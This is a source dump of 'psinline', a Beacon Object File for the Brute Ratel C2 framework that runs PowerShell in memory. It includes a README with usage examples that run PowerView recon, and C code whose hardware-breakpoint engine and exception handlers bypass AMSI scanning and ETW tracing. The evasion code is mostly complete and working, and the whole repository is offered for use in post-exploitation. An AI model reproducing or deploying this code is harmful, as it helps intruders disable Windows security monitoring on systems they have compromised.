_CLIENT_ID 323 | { 324 | HANDLE UniqueProcess; 325 | HANDLE UniqueThread; 326 | } CLIENT_ID, *PCLIENT_ID; 327 | 328 | // 18/04/2011 329 | typedef struct _TEB 330 | { 331 | NT_TIB NtTib; 332 | 333 | PVOID EnvironmentPointer; 334 | CLIENT_ID ClientId; 335 | PVOID ActiveRpcHandle; 336 | PVOID ThreadLocalStoragePointer; 337 | PPEB ProcessEnvironmentBlock; 338 | 339 | ULONG LastErrorValue; 340 | ULONG CountOfOwnedCriticalSections; 341 | PVOID CsrClientThread; 342 | PVOID Win32ThreadInfo; 343 | ULONG User32Reserved[26]; 344 | ULONG UserReserved[5]; 345 | PVOID WOW32Reserved; 346 | LCID CurrentLocale; 347 | ULONG FpSoftwareStatusRegister; 348 | PVOID SystemReserved1[54]; 349 | NTSTATUS ExceptionCode; 350 | PVOID ActivationContextStackPointer; 351 | #if defined(_M_X64) 352 | UCHAR SpareBytes[24]; 353 | #else 354 | UCHAR SpareBytes[36]; 355 | #endif 356 | ULONG TxFsContext; 357 | 358 | GDI_TEB_BATCH GdiTebBatch; 359 | CLIENT_ID RealClientId; 360 | HANDLE GdiCachedProcessHandle; 361 | ULONG GdiClientPID; 362 | ULONG GdiClientTID; 363 | PVOID GdiThreadLocalInfo; 364 | ULONG_PTR Win32ClientInfo[62]; 365 | PVOID glDispatchTable[233]; 366 | ULONG_PTR glReserved1[29]; 367 | PVOID glReserved2; 368 | PVOID glSectionInfo; 369 | PVOID glSection; 370 | PVOID glTable; 371 | PVOID glCurrentRC; 372 | PVOID glContext; 373 | 374 | NTSTATUS LastStatusValue; 375 | UNICODE_STRING StaticUnicodeString; 376 | WCHAR StaticUnicodeBuffer[261]; 377 | 378 | PVOID DeallocationStack; 379 | PVOID TlsSlots[64]; 380 | LIST_ENTRY TlsLinks; 381 | 382 | PVOID Vdm; 383 | PVOID ReservedForNtRpc; 384 | PVOID DbgSsReserved[2]; 385 | 386 | ULONG HardErrorMode; 387 | #if defined(_M_X64) 388 | PVOID Instrumentation[11]; 389 | #else 390 | PVOID Instrumentation[9]; 391 | #endif 392 | GUID ActivityId; 393 | 394 | PVOID SubProcessTag; 395 | PVOID EtwLocalData; 396 | PVOID EtwTraceData; 397 | PVOID WinSockData; 398 | ULONG GdiBatchCount; 399 | 400 | union 401 | { 402 | PROCESSOR_NUMBER CurrentIdealProcessor; 403 | ULONG IdealProcessorValue; 404 | struct 405 | { 406 | UCHAR ReservedPad0; 407 | UCHAR ReservedPad1; 408 | UCHAR ReservedPad2; 409 | UCHAR IdealProcessor; 410 | }; 411 | }; 412 | 413 | ULONG GuaranteedStackBytes; 414 | PVOID ReservedForPerf; 415 | PVOID ReservedForOle; 416 | ULONG WaitingOnLoaderLock; 417 | PVOID SavedPriorityState; 418 | ULONG_PTR SoftPatchPtr1; 419 | PVOID ThreadPoolData; 420 | PPVOID TlsExpansionSlots; 421 | #if defined(_M_X64) 422 | PVOID DeallocationBStore; 423 | PVOID BStoreLimit; 424 | #endif 425 | ULONG MuiGeneration; 426 | ULONG IsImpersonating; 427 | PVOID NlsCache; 428 | PVOID pShimData; 429 | ULONG HeapVirtualAffinity; 430 | HANDLE CurrentTransactionHandle; 431 | PTEB_ACTIVE_FRAME ActiveFrame; 432 | PVOID FlsData; 433 | 434 | PVOID PreferredLanguages; 435 | PVOID UserPrefLanguages; 436 | PVOID MergedPrefLanguages; 437 | ULONG MuiImpersonation; 438 | 439 | union 440 | { 441 | USHORT CrossTebFlags; 442 | USHORT SpareCrossTebBits : 16; 443 | }; 444 | union 445 | { 446 | USHORT SameTebFlags; 447 | struct 448 | { 449 | USHORT SafeThunkCall : 1; 450 | USHORT InDebugPrint : 1; 451 | USHORT HasFiberData : 1; 452 | USHORT SkipThreadAttach : 1; 453 | USHORT WerInShipAssertCode : 1; 454 | USHORT RanProcessInit : 1; 455 | USHORT ClonedThread : 1; 456 | USHORT SuppressDebugMsg : 1; 457 | USHORT DisableUserStackWalk : 1; 458 | USHORT RtlExceptionAttached : 1; 459 | USHORT InitialThread : 1; 460 | USHORT SpareSameTebBits : 1; 461 | }; 462 | }; 463 | 464 | PVOID TxnScopeEnterCallback; 465 | PVOID TxnScopeExitCallback; 466 | PVOID TxnScopeContext; 467 | ULONG LockCount; 468 | ULONG SpareUlong0; 469 | PVOID ResourceRetValue; 470 | } TEB, *PTEB; 471 | 472 | 473 | #ifdef __cplusplus 474 | } 475 | #endif 476 | 477 | 478 | #endif /* _NTDLL_ */ 479 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # psinline 2 | 3 | BOF compatible with BRC4, for executing powershell directly in current process memory, avoiding process injections. Takes as input PS.exe, an assembly running base64-encoded powershell commands. Code mostly taken from [Havoc](https://github.com/HavocFramework/Havoc), 4 | for hardware breakpoints and [InlineExecute-Assembly](https://github.com/anthemtotheego/InlineExecute-Assembly) for running assemblies through BOF. 5 | 6 | ## How it works 7 | 8 | Takes as input the following parameters: 9 | 1. PS.exe: Assembly that executes base64 encoded powershell 10 | 2. Powershell script: A powershell script (.ps1 file). In case you don't need to provide it, you can just create a dummy powershell script with just one line. 11 | 3. powershell command. 12 | 13 | The BOF concatenates your powershell command to the powershell script, base64 encode the concatenation and finally pass the base64 blob as argument to PS.exe that executes it. It uses hardware breakpoints for AMSI/ETW bypass. 14 | 15 | **Be careful that psinline accepts ASCII and may have issues with other encodings**. In case you have issues with loading scripts like PowerUpSQL.ps1, open the script in VSCode, select all, copy all and then paste in a new file. The new file now should be ASCII encoded, and psinline accepts it. 16 | ## How to build 17 | 18 | For building the BOF just run: 19 | ``` 20 | make -f MakeFile release 21 | ``` 22 | 23 | For building the debug version run: 24 | ``` 25 | make -f MakeFile debug 26 | ``` 27 | 28 | For building PS.exe import it in visual studio and compile release version. 29 | 30 | 31 | ## Pre-Compiled binaries 32 | 33 | Pre-compiled binaries are available in the release package. 34 | 35 | ## Examples 36 | 37 | ### Run PowerView cmdlet 38 | 39 | First use coff_args to set PowerView.ps1 as powershell script to load and then use coffexec to execute **Get-NetLocalGroup**: 40 | ``` 41 | => set_coffargs /path/to/PS.exe /path/to/PowerView.ps1 42 | 43 | 2023/09/25 13:51:49 CEST [sent 1842868 bytes] 44 | 45 | [*] CoffExec Arguments Updated 46 | +-------------------------------------------------------------------+ 47 | => coffexec /path/to/psinline.x64.o Get-NetLocalGroup | fl * 48 | 49 | 2023/09/25 13:52:35 CEST [sent 41592 bytes] 50 | 51 | [*] Task-0 [Thread: 6164] 52 | 53 | [*] Coffexec Output: 54 | 55 | [*] Using .NET version v4.0.30319 56 | 57 | 58 | 59 | ComputerName : DESKTOP-URP43TK 60 | GroupName : Access Control Assistance Operators 61 | Comment : Members of this group can remotely query authorization attributes and permissions for resources on this 62 | computer. 63 | 64 | ComputerName : DESKTOP-URP43TK 65 | GroupName : Administrators 66 | Comment : Administrators have complete and unrestricted access to the computer/domain 67 | 68 | [...] 69 | 70 | [+] psinline Finished 71 | 72 | ``` 73 | 74 | ![image](https://github.com/MrAle98/psinline/assets/74059030/45478a52-8b01-424b-a9fa-1f140f05354c) 75 | 76 | 77 | ### Run generic powershell command 78 | 79 | Set script to import a dummy powershell script and then run **ls** command with coffexec. You can find an example of dummy powershell script in the release package, named dummy.ps1: 80 | ``` 81 | => set_coffargs /path/to/PS.exe /path/to/dummy.ps1 82 | 83 | 2023/09/25 14:28:26 CEST [sent 17032 bytes] 84 | 85 | [*] CoffExec Arguments Updated 86 | +-------------------------------------------------------------------+ 87 | => coffexec /home/kali/CLionProjects/psinline/psinline.x64.o ls 88 | [*] Coffexec Output: 89 | 90 | [*] Using .NET version v4.0.30319 91 | 92 | 93 | 94 | Directory: C:\temp\inceptor\inceptor\inceptor 95 | 96 | 97 | Mode LastWriteTime Length Name 98 | ---- ------------- ------ ---- 99 | d----- 5/23/2023 12:07 AM artifacts 100 | d----- 5/23/2023 12:07 AM certs 101 | d----- 6/11/2023 9:14 AM compilers 102 | d----- 6/2/2023 5:00 PM config 103 | d----- 6/2/2023 5:00 PM converters 104 | d----- 6/2/2023 5:00 PM demo 105 | [...] 106 | 107 | [+] psinline Finished 108 | ``` 109 | 110 | ![image](https://github.com/MrAle98/psinline/assets/74059030/f50e3139-f834-4e52-a9db-ee45decd071c) 111 | 112 | 113 | ## Notes 114 | 115 | Everytime you launch psinline, **wait for it to finish before launching it again**. Having **two threads running psinline at same time will break things and kill your process**. 116 | 117 | ## Credits 118 | - [@C5pider](https://github.com/Cracked5pider) 119 | - [@anthemtotheego](https://github.com/anthemtotheego) 120 | -------------------------------------------------------------------------------- /badger_exports.h: -------------------------------------------------------------------------------- 1 | // 2 | // Created by kali on 19/09/23. 3 | // 4 | 5 | #ifndef PSINLINE_BADGER_EXPORTS_H 6 | #define PSINLINE_BADGER_EXPORTS_H 7 | 8 | #endif //PSINLINE_BADGER_EXPORTS_H 9 | 10 | #include 11 | 12 | void coffee(char** argv, int argc, WCHAR** dispatch); 13 | DECLSPEC_IMPORT int BadgerDispatch(WCHAR** dispatch, const char *__format, ...); 14 | DECLSPEC_IMPORT int BadgerDispatchW(WCHAR** dispatch, const WCHAR*__format, ...); 15 | DECLSPEC_IMPORT size_t BadgerStrlen(CHAR* buf); 16 | DECLSPEC_IMPORT size_t BadgerWcslen(WCHAR* buf); 17 | DECLSPEC_IMPORT void *BadgerMemcpy(void *dest, const void *src, size_t len) ; 18 | DECLSPEC_IMPORT void *BadgerMemset(void *dest, int val, size_t len); 19 | DECLSPEC_IMPORT int BadgerStrcmp(const char *p1, const char *p2); 20 | DECLSPEC_IMPORT int BadgerWcscmp(const wchar_t *s1, const wchar_t *s2); 21 | DECLSPEC_IMPORT int BadgerAtoi(char* string); 22 | DECLSPEC_IMPORT PVOID BadgerAlloc(SIZE_T length); 23 | DECLSPEC_IMPORT VOID BadgerFree(PVOID *memptr); 24 | DECLSPEC_IMPORT BOOL BadgerSetdebug(); 25 | DECLSPEC_IMPORT ULONG BadgerGetBufferSize(PVOID buffer); 26 | -------------------------------------------------------------------------------- /common.h: -------------------------------------------------------------------------------- 1 | // 2 | // Created by kali on 19/09/23. 3 | // 4 | 5 | #ifndef PSINLINE_COMMON_H 6 | #define PSINLINE_COMMON_H 7 | #include 8 | #include "Native.h" 9 | //MSVCRT 10 | WINBASEAPI void* WINAPI MSVCRT$malloc(SIZE_T); 11 | WINBASEAPI void* WINAPI MSVCRT$free(VOID*); 12 | WINBASEAPI void* __cdecl MSVCRT$strcat(char*_Dst,char*_Src); 13 | WINBASEAPI void* __cdecl MSVCRT$memcpy(void* __restrict _Dst, const void* __restrict _Src, size_t _MaxCount); 14 | WINBASEAPI void __cdecl MSVCRT$memset(void* dest, int c, size_t count); 15 | WINBASEAPI int __cdecl MSVCRT$strcmp(const char* _Str1, const char* _Str2); 16 | WINBASEAPI SIZE_T WINAPI MSVCRT$strlen(const char* str); 17 | WINBASEAPI int __cdecl MSVCRT$_snprintf(char* s, size_t n, const char* fmt, ...); 18 | WINBASEAPI errno_t __cdecl MSVCRT$mbstowcs_s(size_t* pReturnValue, wchar_t* wcstr, size_t sizeInWords, const char* mbstr, size_t count); 19 | WINBASEAPI size_t __cdecl MSVCRT$wcslen(const wchar_t *_Str); 20 | WINBASEAPI char* WINAPI MSVCRT$_strlwr(char * str); 21 | WINBASEAPI char* WINAPI MSVCRT$strrchr(char * str); 22 | WINBASEAPI int __cdecl MSVCRT$_open_osfhandle (intptr_t osfhandle, int flags); 23 | WINBASEAPI int __cdecl MSVCRT$_dup2( int fd1, int fd2 ); 24 | WINBASEAPI int __cdecl MSVCRT$_close(int fd); 25 | WINBASEAPI int __cdecl MSVCRT$rand(void); 26 | WINADVAPI LONG WINAPI ADVAPI32$RegOpenKeyExA (HKEY, LPCSTR, DWORD, REGSAM, PHKEY); 27 | WINADVAPI LONG WINAPI ADVAPI32$RegCloseKey(HKEY); 28 | WINADVAPI LONG WINAPI ADVAPI32$RegSaveKeyA (HKEY, LPCSTR, LPSECURITY_ATTRIBUTES); 29 | WINBASEAPI BOOL WINAPI ADVAPI32$OpenProcessToken (HANDLE, DWORD, PHANDLE); 30 | WINBASEAPI DWORD WINAPI KERNEL32$GetLastError (void); 31 | WINBASEAPI BOOL WINAPI ADVAPI32$LookupPrivilegeValueA (LPCSTR, LPCSTR, PLUID); 32 | WINBASEAPI BOOL WINAPI ADVAPI32$AdjustTokenPrivileges(HANDLE, BOOL, PTOKEN_PRIVILEGES, DWORD, PTOKEN_PRIVILEGES, PDWORD); 33 | WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentProcess (void); 34 | WINBASEAPI BOOL WINAPI KERNEL32$CloseHandle (HANDLE); 35 | WINBASEAPI LPSTR WINAPI SHLWAPI$PathCombineA(LPSTR,LPCSTR,LPCSTR); 36 | WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentThread (VOID); 37 | WINADVAPI WINBOOL WINAPI ADVAPI32$OpenThreadToken (HANDLE ThreadHandle, DWORD DesiredAccess, WINBOOL OpenAsSelf, PHANDLE TokenHandle); 38 | WINBASEAPI PVOID WINAPI KERNEL32$AddVectoredExceptionHandler (ULONG First, PVECTORED_EXCEPTION_HANDLER Handler); 39 | WINBASEAPI ULONG WINAPI KERNEL32$RemoveVectoredExceptionHandler (PVOID Handle); 40 | //KERNEL32 41 | WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap(); 42 | WINBASEAPI void * WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); 43 | WINBASEAPI int WINAPI KERNEL32$lstrlenA(LPCSTR lpString); 44 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); 45 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateMailslotA(LPCSTR lpName, DWORD nMaxMessageSize, DWORD lReadTimeout, LPSECURITY_ATTRIBUTES lpSecurityAttributes); 46 | WINBASEAPI BOOL WINAPI KERNEL32$GetMailslotInfo(HANDLE hMailslot, LPDWORD lpMaxMessageSize, LPDWORD lpNextSize, LPDWORD lpMessageCount, LPDWORD lpReadTimeout); 47 | WINBASEAPI BOOL WINAPI KERNEL32$ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped); 48 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName); 49 | DECLSPEC_IMPORT HGLOBAL KERNEL32$GlobalAlloc(UINT uFlags, SIZE_T dwBytes); 50 | DECLSPEC_IMPORT HGLOBAL KERNEL32$GlobalFree(HGLOBAL hMem); 51 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$VirtualProtect (PVOID, DWORD, DWORD, PDWORD); 52 | //SHELL32 53 | WINBASEAPI LPWSTR* WINAPI SHELL32$CommandLineToArgvW(LPCWSTR lpCmdLine, int* pNumArgs); 54 | //MSCOREE 55 | WINBASEAPI HRESULT WINAPI MSCOREE$CLRCreateInstance(REFCLSID clsid, REFIID riid, LPVOID* ppInterface); 56 | //OLEAUT32 57 | WINBASEAPI SAFEARRAY* WINAPI OLEAUT32$SafeArrayCreateVector(VARTYPE vt, LONG lLbound, ULONG cElements); 58 | WINBASEAPI SAFEARRAY* WINAPI OLEAUT32$SafeArrayCreate(VARTYPE vt, UINT cDims, SAFEARRAYBOUND* rgsabound); 59 | WINBASEAPI HRESULT WINAPI OLEAUT32$SafeArrayAccessData(SAFEARRAY* psa, void HUGEP** ppvData); 60 | WINBASEAPI HRESULT WINAPI OLEAUT32$SafeArrayUnaccessData(SAFEARRAY* psa); 61 | WINBASEAPI HRESULT WINAPI OLEAUT32$SafeArrayPutElement(SAFEARRAY* psa, LONG* rgIndices, void* pv); 62 | WINBASEAPI HRESULT WINAPI OLEAUT32$SafeArrayDestroy(SAFEARRAY* psa); 63 | WINBASEAPI HRESULT WINAPI OLEAUT32$VariantClear(VARIANTARG* pvarg); 64 | WINBASEAPI BSTR WINAPI OLEAUT32$SysAllocString(const OLECHAR* psz); 65 | 66 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateNamedPipeA (LPCSTR lpName, DWORD dwOpenMode, DWORD dwPipeMode, DWORD nMaxInstances, DWORD nOutBufferSize, DWORD nInBufferSize, DWORD nDefaultTimeOut, LPSECURITY_ATTRIBUTES lpSecurityAttributes); 67 | WINBASEAPI WINBOOL WINAPI KERNEL32$SetStdHandle (DWORD nStdHandle, HANDLE hHandle); 68 | WINBASEAPI HANDLE WINAPI KERNEL32$GetStdHandle (DWORD nStdHandle); 69 | WINBASEAPI WINBOOL WINAPI KERNEL32$AllocConsole(VOID); 70 | WINBASEAPI WINBOOL WINAPI KERNEL32$GetThreadContext (HANDLE hThread, LPCONTEXT lpContext); 71 | WINBASEAPI WINBOOL WINAPI KERNEL32$SetThreadContext (HANDLE hThread, CONST CONTEXT *lpContext); 72 | WINBASEAPI HANDLE WINAPI KERNEL32$OpenThread (DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwThreadId); 73 | WINBASEAPI HWND WINAPI KERNEL32$GetConsoleWindow(VOID); 74 | WINUSERAPI WINBOOL WINAPI USER32$ShowWindow(HWND hWnd,int nCmdShow); 75 | WINBASEAPI WINBOOL WINAPI KERNEL32$SetStdHandle (DWORD nStdHandle, HANDLE hHandle); 76 | WINBASEAPI WINBOOL WINAPI KERNEL32$FreeConsole(VOID); 77 | WINBASEAPI HMODULE WINAPI KERNEL32$LoadLibraryA(LPCSTR lpLibFileName); 78 | WINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress (HMODULE hModule, LPCSTR lpProcName); 79 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateMutexA (LPSECURITY_ATTRIBUTES lpMutexAttributes, WINBOOL bInitialOwner, LPCSTR lpName); 80 | WINBASEAPI DWORD WINAPI KERNEL32$WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds); 81 | WINBASEAPI WINBOOL WINAPI KERNEL32$ReleaseMutex (HANDLE hMutex); 82 | 83 | WINIMPM WINBOOL WINAPI CRYPT32$CryptBinaryToStringA (CONST BYTE *pbBinary, DWORD cbBinary, DWORD dwFlags, LPSTR pszString, DWORD *pcchString); 84 | 85 | 86 | typedef NTSTATUS(NTAPI* _NtWriteVirtualMemory)(HANDLE, PVOID, PVOID, ULONG, PULONG);//NtWriteVirtualMemory 87 | typedef NTSTATUS(NTAPI* _NtProtectVirtualMemory)(HANDLE, PVOID, PULONG, ULONG, PULONG);//NtProtectVirtualMemory 88 | #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) 89 | //#define STATUS_SUCCESS 0x0 90 | #endif //PSINLINE_COMMON_H 91 | -------------------------------------------------------------------------------- /psinline.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | //#include "psinline.h" 6 | #include "Clr.h" 7 | #include "badger_exports.h" 8 | #include "common.h" 9 | #include "HwBpEngine.h" 10 | #include "HwBpExceptions.h" 11 | #include "utils.h" 12 | //#include "global.c" 13 | 14 | 15 | WCHAR** gdispatch = NULL; 16 | 17 | VOID HwBpExAmsiScanBuffer( 18 | IN OUT PEXCEPTION_POINTERS Exception 19 | ) { 20 | PVOID Return = NULL; 21 | 22 | /* get AmsiResult param */ 23 | EXCEPTION_ARG_5( Exception ) = 0; 24 | 25 | /* set return to S_OK */ 26 | EXCEPTION_SET_RET( Exception, 0x80070057 ); /* invalid parameter */ 27 | 28 | /* just return now */ 29 | Return = EXCEPTION_GET_RET( Exception ); 30 | EXCEPTION_ADJ_STACK( Exception, sizeof( PVOID ) ); 31 | EXCEPTION_SET_RIP( Exception, U_PTR( Return ) ); 32 | } 33 | 34 | VOID HwBpExNtTraceEvent( 35 | IN OUT PEXCEPTION_POINTERS Exception 36 | ) { 37 | PVOID Return = NULL; 38 | 39 | /* just return without tracing an event */ 40 | Return = EXCEPTION_GET_RET( Exception ); 41 | EXCEPTION_ADJ_STACK( Exception, sizeof( PVOID ) ); 42 | EXCEPTION_SET_RIP( Exception, U_PTR( Return ) ); 43 | } 44 | 45 | // 46 | ////START HWBPENGINE 47 | PHWBP_ENGINE gEngine = NULL; 48 | HANDLE ghMutex = INVALID_HANDLE_VALUE; 49 | //\ 50 | // 51 | ///*! 52 | // * Init Hardware breakpoint engine by 53 | // * registering a Vectored exception handler 54 | // * @param Engine if emtpy global handler gonna be used 55 | // * @param Handler 56 | // * @return 57 | // */ 58 | LONG ExceptionHandler( 59 | IN OUT PEXCEPTION_POINTERS Exception 60 | ); 61 | // 62 | NTSTATUS HwBpEngineInit( 63 | OUT PHWBP_ENGINE Engine, 64 | IN PVOID Handler 65 | ) { 66 | PHWBP_ENGINE HwBpEngine = Engine; 67 | PVOID HwBpHandler = Handler; 68 | 69 | /* check if an engine object has been specified in the function param. 70 | * if not then check if teh callee want's to init the global engine. 71 | * tho if the global engine has been already init then abort */ 72 | // if ( ( ! HwBpEngine && ! HwBpHandler ) ) { 73 | // return STATUS_INVALID_PARAMETER; 74 | // } 75 | 76 | /* since we did not specify an engine let's use the global one */ 77 | if ( ! HwBpEngine ) { 78 | HwBpEngine = MSVCRT$malloc( sizeof( HWBP_ENGINE ) ); 79 | HwBpHandler = &ExceptionHandler; 80 | } 81 | 82 | /* register Vectored exception handler */ 83 | if ( ! ( HwBpEngine->Veh = KERNEL32$AddVectoredExceptionHandler( TRUE, HwBpHandler ) ) ) { 84 | return STATUS_UNSUCCESSFUL; 85 | } 86 | 87 | /* tell the engine that it has not added anything atm */ 88 | HwBpEngine->First = TRUE; 89 | 90 | gEngine = HwBpEngine; 91 | #ifdef DEBUG 92 | BadgerDispatch(gdispatch,"[*] gEngine = 0x%p\n",gEngine); 93 | #endif 94 | return STATUS_SUCCESS; 95 | } 96 | 97 | /////*! 98 | //// * Set hardware breakpoint on specified address 99 | //// * @param Tib 100 | //// * @param Address 101 | //// * @param Position 102 | //// * @param Add 103 | //// * @return 104 | //// */ 105 | NTSTATUS HwBpEngineSetBp( 106 | IN DWORD Tid, 107 | IN PVOID Address, 108 | IN BYTE Position, 109 | IN BYTE Add 110 | ) { 111 | //CLIENT_ID Client = { 0 }; 112 | CONTEXT Context = { 0 }; 113 | HANDLE Thread = NULL; 114 | NTSTATUS Status = STATUS_SUCCESS; 115 | //OBJECT_ATTRIBUTES ObjAttr = { 0 }; 116 | // 117 | // /* Initialize Object Attributes */ 118 | // //InitializeObjectAttributes( &ObjAttr, NULL, 0, NULL, NULL ); 119 | // 120 | //// Client.UniqueProcess = C_PTR( Pid ); 121 | //// Client.UniqueThread = C_PTR( Tid ); 122 | // 123 | // /* try to get open thread handle */ 124 | Thread = KERNEL32$OpenThread(THREAD_ALL_ACCESS,FALSE,Tid); 125 | if(Thread == INVALID_HANDLE_VALUE){ 126 | BadgerDispatch(gdispatch,"OpenThread failed with error: %d",KERNEL32$GetLastError()); 127 | goto FAILED; 128 | } 129 | 130 | Context.ContextFlags = CONTEXT_DEBUG_REGISTERS; 131 | 132 | /* try to get context of thread */ 133 | if(!KERNEL32$GetThreadContext(Thread,&Context)){ 134 | BadgerDispatch(gdispatch,"GetThreadContext failed with error: %d",KERNEL32$GetLastError()); 135 | goto FAILED; 136 | } 137 | 138 | /* add hardware breakpoint */ 139 | if ( Add ) 140 | { 141 | /* set address */ 142 | ( &Context.Dr0 )[ Position ] = U_PTR( Address ); 143 | 144 | /* setup registers */ 145 | Context.Dr7 &= ~( 3ull << ( 16 + 4 * Position ) ); 146 | Context.Dr7 &= ~( 3ull << ( 18 + 4 * Position ) ); 147 | Context.Dr7 |= 1ull << ( 2 * Position ); 148 | } 149 | else /* remove hardware breakpoint */ 150 | { 151 | if ( ( &Context.Dr0 )[ Position ] == Address ) { 152 | #ifdef DEBUG 153 | BadgerDispatch(gdispatch, 154 | "Dr Registers: \n" 155 | "- Dr0[%d]: %p \n" 156 | "- Dr7 : %p \n", 157 | Position, ( &Context.Dr0 )[ Position ], 158 | Context.Dr7 159 | ); 160 | #endif 161 | ( &Context.Dr0 )[ Position ] = U_PTR( NULL ); 162 | Context.Dr7 &= ~( 1ull << ( 2 * Position ) ); 163 | #ifdef DEBUG 164 | BadgerDispatch(gdispatch, 165 | "Dr Registers: \n" 166 | "- Dr0[%d]: %p \n" 167 | "- Dr7 : %p \n", 168 | Position, ( &Context.Dr0 )[ Position ], 169 | Context.Dr7 170 | ); 171 | #endif 172 | } 173 | } 174 | 175 | if(!KERNEL32$SetThreadContext(Thread,&Context)){ 176 | BadgerDispatch(gdispatch,"failed second getThreadContext. Error = %d\n",KERNEL32$GetLastError()); 177 | goto FAILED; 178 | } 179 | 180 | return Status; 181 | 182 | FAILED: 183 | if ( Thread ) { 184 | KERNEL32$CloseHandle( Thread ); 185 | Thread = NULL; 186 | } 187 | 188 | return Status; 189 | } 190 | 191 | /////*! 192 | //// * Set an hardware breakpoint to an address 193 | //// * and adds it to the engine breakpoints list linked 194 | //// * @param Engine 195 | //// * @param Thread 196 | //// * @param Address 197 | //// * @param Function 198 | //// * @param Position 199 | //// * @return 200 | //// */ 201 | NTSTATUS HwBpEngineAdd( 202 | IN PHWBP_ENGINE Engine, 203 | IN DWORD Tid, 204 | IN PVOID Address, 205 | IN PVOID Function, 206 | IN BYTE Position 207 | ) { 208 | PHWBP_ENGINE HwBpEngine = gEngine; 209 | PBP_LIST BpEntry = NULL; 210 | #ifdef DEBUG 211 | BadgerDispatch(gdispatch, "Engine:[%p] Tid:[%d] Address:[%p] Function:[%p] Position:[%d]\n", HwBpEngine, Tid, Address, Function, Position ); 212 | #endif 213 | // /* check if engine has been specified */ 214 | // if ( ! HwBpEngine ) { 215 | // return STATUS_INVALID_PARAMETER; 216 | // } 217 | 218 | /* check if the right params has been specified */ 219 | if ( ! Address || ! Function ) { 220 | return STATUS_INVALID_PARAMETER; 221 | } 222 | 223 | /* if no engine specified use the global one */ 224 | // if ( ! HwBpEngine ) { 225 | // HwBpEngine = Instance.HwBpEngine; 226 | // } 227 | 228 | /* create bp entry */ 229 | BpEntry = MSVCRT$malloc( sizeof( BP_LIST ) ); 230 | BpEntry->Tid = Tid; 231 | BpEntry->Address = Address; 232 | BpEntry->Function = Function; 233 | BpEntry->Position = Position; 234 | BpEntry->Next = gEngine->Breakpoints; 235 | 236 | /* set breakpoint */ 237 | if ( ! NT_SUCCESS( HwBpEngineSetBp( Tid, Address, Position, TRUE ) ) ) { 238 | BadgerDispatch(gdispatch, "[HWBP] Failed to set hardware breakpoint\n" ); 239 | goto FAILED; 240 | } 241 | #ifdef DEBUG 242 | BadgerDispatch(gdispatch, "[HWBP] Added hardware breakpoint: Tid:[%d] Addr:[%p] Pos:[%d]\n", Tid, Address, Position ); 243 | #endif 244 | 245 | /* append breakpoint */ 246 | gEngine->Breakpoints = BpEntry; 247 | 248 | return STATUS_SUCCESS; 249 | 250 | FAILED: 251 | if ( BpEntry ) { 252 | MSVCRT$free( BpEntry ); 253 | BpEntry = NULL; 254 | } 255 | 256 | return STATUS_UNSUCCESSFUL; 257 | } 258 | 259 | NTSTATUS HwBpEngineRemove( 260 | IN PHWBP_ENGINE Engine, 261 | IN DWORD Tid, 262 | IN PVOID Address 263 | ) { 264 | PHWBP_ENGINE HwBpEngine = NULL; 265 | PBP_LIST BpEntry = NULL; 266 | PBP_LIST BpLast = NULL; 267 | 268 | // if ( ! Engine ) { 269 | // return STATUS_INVALID_PARAMETER; 270 | // } 271 | // 272 | // if ( ! HwBpEngine ) { 273 | // HwBpEngine = Instance.HwBpEngine; 274 | // } 275 | 276 | 277 | /* set linked list */ 278 | BpEntry = BpLast = gEngine->Breakpoints; 279 | 280 | for ( ;; ) 281 | { 282 | /* check if BpEntry is NULL */ 283 | if ( ! BpEntry ) { 284 | break; 285 | } 286 | 287 | /* is it the breakpoint we want to remove ? */ 288 | if ( BpEntry->Tid == Tid && BpEntry->Address == Address ) 289 | { 290 | /* unlink from linked list */ 291 | BpLast->Next = BpEntry->Next; 292 | 293 | /* disable hardware breakpoint */ 294 | HwBpEngineSetBp( BpEntry->Tid, BpEntry->Address, BpEntry->Position, FALSE ); 295 | 296 | /* zero out struct */ 297 | BadgerMemset( BpEntry, 0,sizeof( BP_LIST ) ); 298 | 299 | /* free memory struct */ 300 | MSVCRT$free( BpEntry ); 301 | 302 | break; 303 | } 304 | 305 | BpLast = BpEntry; 306 | BpEntry = BpEntry->Next; 307 | } 308 | 309 | return STATUS_SUCCESS; 310 | } 311 | 312 | NTSTATUS HwBpEngineDestroy( 313 | IN PHWBP_ENGINE Engine 314 | ) { 315 | PHWBP_ENGINE HwBpEngine = Engine; 316 | PBP_LIST BpEntry = NULL; 317 | PBP_LIST BpNext = NULL; 318 | 319 | if ( ! gEngine ) { 320 | return STATUS_INVALID_PARAMETER; 321 | } 322 | //KERNEL32$WaitForSingleObject(ghMutex,INFINITE); 323 | // if ( ! HwBpEngine ) { 324 | // HwBpEngine = Instance.HwBpEngine; 325 | // } 326 | 327 | /* remove Vector exception handler */ 328 | 329 | KERNEL32$RemoveVectoredExceptionHandler( gEngine->Veh ); 330 | 331 | BpEntry = gEngine->Breakpoints; 332 | 333 | /* remove all breakpoints and free memory */ 334 | do { 335 | /* check if BpEntry is NULL */ 336 | if ( ! BpEntry ) { 337 | break; 338 | } 339 | 340 | /* get next element from linked list */ 341 | BpNext = BpEntry->Next; 342 | 343 | /* 